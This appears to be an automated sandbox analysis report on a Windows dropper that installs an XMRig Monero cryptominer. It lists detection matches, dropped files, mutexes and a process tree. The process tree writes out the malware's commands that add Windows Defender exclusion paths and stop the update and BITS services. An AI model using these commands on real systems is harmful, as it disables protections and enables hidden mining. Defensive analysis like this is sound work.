Source: Yara match	File source: 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1706633239.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 4236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 446629599.exe PID: 4260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 5948, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\446629599.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1706633239.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: winupsecvmgr.exe PID: 6256, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040FB45 NtQueryVirtualMemory,	5_2_0040FB45
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,	5_2_0040DF20
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040FB45 NtQueryVirtualMemory,	6_2_0040FB45
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,	6_2_0040DF20
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040FB45 NtQueryVirtualMemory,	19_2_0040FB45
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,	19_2_0040DF20
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Code function: 20_2_00007FFAAC1A0685 NtQuerySystemInformation,	20_2_00007FFAAC1A0685
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Code function: 20_2_00007FFAAC1A0F11 NtQuerySystemInformation,	20_2_00007FFAAC1A0F11
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Code function: 20_2_00007FFAAC1A0690 NtQuerySystemInformation,	20_2_00007FFAAC1A0690
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Code function: 53_2_00007FFAAC190685 NtQuerySystemInformation,	53_2_00007FFAAC190685
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Code function: 53_2_00007FFAAC190690 NtQuerySystemInformation,	53_2_00007FFAAC190690
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Code function: 53_2_00007FFAAC190F11 NtQuerySystemInformation,	53_2_00007FFAAC190F11
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F03F40 NtClose,	63_2_00007FF6B6F03F40

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

File created: C:\Windows\sysppvrdnvs.exe

Jump to behavior

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400A2000	1_2_00000001400A2000
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140001052	1_2_0000000140001052
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140058510	1_2_0000000140058510
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140034FF0	1_2_0000000140034FF0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140013FF0	1_2_0000000140013FF0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014000F0B0	1_2_000000014000F0B0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140063110	1_2_0000000140063110
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140043240	1_2_0000000140043240
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140070280	1_2_0000000140070280
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014006A288	1_2_000000014006A288
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400112A0	1_2_00000001400112A0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014003E2C0	1_2_000000014003E2C0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400192F0	1_2_00000001400192F0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014006C350	1_2_000000014006C350
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140042360	1_2_0000000140042360
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400673AC	1_2_00000001400673AC
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140062484	1_2_0000000140062484
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014001F4A0	1_2_000000014001F4A0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014006D4D4	1_2_000000014006D4D4
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140059550	1_2_0000000140059550
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400105F0	1_2_00000001400105F0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140054680	1_2_0000000140054680
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400536B0	1_2_00000001400536B0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014005A708	1_2_000000014005A708
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140023730	1_2_0000000140023730
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140050830	1_2_0000000140050830
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140024910	1_2_0000000140024910
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140047960	1_2_0000000140047960
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400089D0	1_2_00000001400089D0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014004CA20	1_2_000000014004CA20
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140047A30	1_2_0000000140047A30
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014006AA60	1_2_000000014006AA60
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140071A78	1_2_0000000140071A78
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014004CAB0	1_2_000000014004CAB0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014003DAE0	1_2_000000014003DAE0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140050B80	1_2_0000000140050B80
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140015BD0	1_2_0000000140015BD0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140024C90	1_2_0000000140024C90
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140009CD0	1_2_0000000140009CD0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140025CE0	1_2_0000000140025CE0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014000BD30	1_2_000000014000BD30
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140006D83	1_2_0000000140006D83
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140056DE0	1_2_0000000140056DE0
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014005BE08	1_2_000000014005BE08
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014005FEAC	1_2_000000014005FEAC
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140022EF7	1_2_0000000140022EF7
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140018F20	1_2_0000000140018F20
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140043F30	1_2_0000000140043F30
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014003EF80	1_2_000000014003EF80
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140045FE0	1_2_0000000140045FE0
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004084D0	5_2_004084D0
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004084F9	5_2_004084F9
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_00404090	5_2_00404090
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040AEB0	5_2_0040AEB0
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_00404970	5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040F908	5_2_0040F908
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004084D0	6_2_004084D0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004084F9	6_2_004084F9
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_00404090	6_2_00404090
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040AEB0	6_2_0040AEB0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_00404970	6_2_00404970
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040F908	6_2_0040F908
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004084D0	19_2_004084D0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004084F9	19_2_004084F9
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_00404090	19_2_00404090
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040AEB0	19_2_0040AEB0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_00404970	19_2_00404970
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040F908	19_2_0040F908
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F185C0	63_2_00007FF6B6F185C0
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F16D80	63_2_00007FF6B6F16D80
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F13DE0	63_2_00007FF6B6F13DE0
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F07190	63_2_00007FF6B6F07190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A0F4D	64_2_00007FFAAC1A0F4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A0FA4	64_2_00007FFAAC1A0FA4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A0FB4	64_2_00007FFAAC1A0FB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A0F94	64_2_00007FFAAC1A0F94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A0FE4	64_2_00007FFAAC1A0FE4

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe 1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256

Source: C:\Windows\System32\conhost.exe	Code function: String function: 00007FF6B6F03F40 appears 34 times
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: String function: 0000000140005B20 appears 55 times

Source: nxmr[1].exe.29.dr	Static PE information: Number of sections : 11 > 10
Source: winupsecvmgr.exe.34.dr	Static PE information: Number of sections : 11 > 10
Source: 2448028260.exe.29.dr	Static PE information: Number of sections : 11 > 10

Source: 158238779.exe.6.dr	Static PE information: No import functions for PE file found
Source: 193938922.exe.35.dr	Static PE information: No import functions for PE file found

Source: T52Z708x2p.exe, 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameowdiff0 vs T52Z708x2p.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: winupsecvmgr.exe PID: 6256, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@105/57@2/31

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Code function: 5_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,

5_2_00406F70

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Code function: 5_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,

5_2_00406660

Source: C:\Users\user\Desktop\T52Z708x2p.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\sysppvrdnvs.exe	Mutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03

Source: C:\Users\user\Desktop\T52Z708x2p.exe

File created: C:\Users\user~1\AppData\Local\Temp\70AF.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Command line argument: (#	27_2_00E810A0
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Command line argument: `#	27_2_00E810A0
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Command line argument: L$	27_2_00E810A0
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Command line argument: $	27_2_00E810A0

Source: C:\Users\user\AppData\Local\Temp\158238779.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\sysppvrdnvs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: T52Z708x2p.exe	Virustotal: Detection: 59%
Source: T52Z708x2p.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\T52Z708x2p.exe "C:\Users\user\Desktop\T52Z708x2p.exe"
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Process created: C:\Users\user\AppData\Local\Temp\70AF.exe "C:\Users\user~1\AppData\Local\Temp\70AF.exe"
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Process created: C:\Users\user\AppData\Local\Temp\1706633239.exe C:\Users\user~1\AppData\Local\Temp\1706633239.exe
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Process created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
